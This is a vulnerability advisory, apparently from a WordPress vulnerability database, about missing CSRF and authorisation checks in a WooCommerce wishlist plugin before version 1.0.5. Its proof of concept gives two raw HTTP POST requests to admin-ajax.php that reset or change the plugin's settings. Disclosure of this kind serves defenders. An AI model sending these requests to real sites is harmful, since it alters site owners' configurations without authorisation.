WordPress Plugin Vulnerabilities
ThemeHigh WooCommerce Wishlist and Comparison < 1.0.5 - Unauthorised AJAX call
Description
Some AJAX actions did not have proper CSRF and authorisation checks, allowing unauthorised call either via unauthenticated/low privilege users or CSRF, which could allow attackers to reset or change the settings of the plugin for example
Proof of Concept
Reset arbitrary option in the plugin (v < 1.0.5) POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 46 Connection: close action=reset_to_default&reset=general_settings Save General Settings (v < 1.0.3) POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 163 Connection: close action=save_general_settings&wishlist_page=&ajax_loading=false&require_login=false&wishlnk_myaccont=false&remove_pdct=true&chckut_redrct=false&success_notice=false Other actions were possible
Affects Plugins
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-08 (about 3 years ago)
Added
2021-05-08 (about 3 years ago)
Last Updated
2021-05-08 (about 3 years ago)